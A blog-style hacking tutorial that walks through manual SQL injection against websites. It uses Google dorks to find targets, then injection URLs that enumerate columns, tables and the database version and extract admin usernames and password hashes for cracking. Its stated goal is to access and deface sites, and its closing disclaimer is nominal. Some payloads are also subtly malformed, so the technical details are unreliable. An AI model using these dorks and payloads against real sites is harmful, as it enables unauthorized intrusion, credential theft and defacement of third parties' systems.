Hello Everyone today post too interesting because this post on Website Hack,this is very good and interesting line for all Hacker but newbie how to know about this,my post given you complete introduction on SQL Injection.
SQL (Structured Query Language)Injection is the first step of hacking any site.By use of SQL injection we hack any site which vulnerable.SQL Injection is a technique in which hacker insert a SQL code into web pages to get Information like User or Admin Name and Passwords of site for access the site and Deface it.
Before know about attack please clear your basic knowledge...
Data present in the column and many column present in tables and tables are part of Data Base.
Today many tools (Like Havij)are available for found a vulnerable site by this any newbie hack site easily but if you want make a original Hacker not Script Kid use some manual trick who help you hack any site and also increase your knowledge for future.
So if you are ready so let's start...
STEP 0: First find vulnerable site by use of this given Dorks...
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminhome.asp"
"inurl:newsdetail.php"
"inurl:shop.php"
You search Google Uncle for more Dork.
STEP 1: At first step we check a site vulnerable or not,here i am use some picture for help you to understand all step clear fully,i am access this site DB but not hack it because i am a Ethical Hacker and do everything only for knowledge and save other person by Black site Hacking.well come on our topic,here we test the this site vulnerable or not.For this i am add only ' in end of URL for example...
CODE:
http://www.sitename.com/newsdetail.php?id=10'
You see a error page like given below page,i am show error with red line,if you not find it go to other site and use same step.
STEP 2: After find vulnerable site i am going found number of columns in your site. Add only
order by 1,2,.... and -- end of your Site URL like i am check column
http://www.sitename/newsdetail.php?id=10 order by 1-- >>>>page refresh
http://www.sitename/newsdetail.php?id=10 order by 2-- >>>>page refresh
http://www.sitename/newsdetail.php?id=10 order by 3-- >>>>page refresh
http://www.sitename/newsdetail.php?id=10 order by 4-- >>>>page given error
This mean in your site only 3 column.After it find accessible column for it write...
http://www.sitename.com/newsdetail.php?id=10 union all 1,2,3--
it shown you like below...
STEP 3: Here we find data base of vulnerable site....
http://www.sitename.com/newsdetail.php?id=10 union all 1,@@version,3--
It shown DB and his name like given below...
STEP 4: Here we find table name for it use this code...
http://www.sitename.com/newsdetail.php?id=10 union select 1,table_name,3 from information_schema.table--
This line shown you table name like given below...
STEP 5: Here i am going get the column name of site.For this we use this code...
http://www.sitename.com/newsdetail.php?id=10 union select 1,column_name,3 from information_schema.columns--
Which shown you all column like given below...
STEP 6: This is the last step where you try to get User or Admin name of site and his Password. For this we use this code...
http://www.sitename.com/newsdetail.php?id=-10 union select 1,concat(username,0x3a,password),3 from table
It given you user name and password like given below but this password encrypt in md5 so we use online tool for decrypt it.
For going on line tool click
here
For write this post i am spend two days but you spend only 1 minute on given your good comment,your comment for me like prize and encourage me on future for write too good post for you.
*Purpose of this post only increase the knowledge of the viewer do not use it for any hacking activity because loss of other person is not good in eye of good.
Hi bro,g8t work done.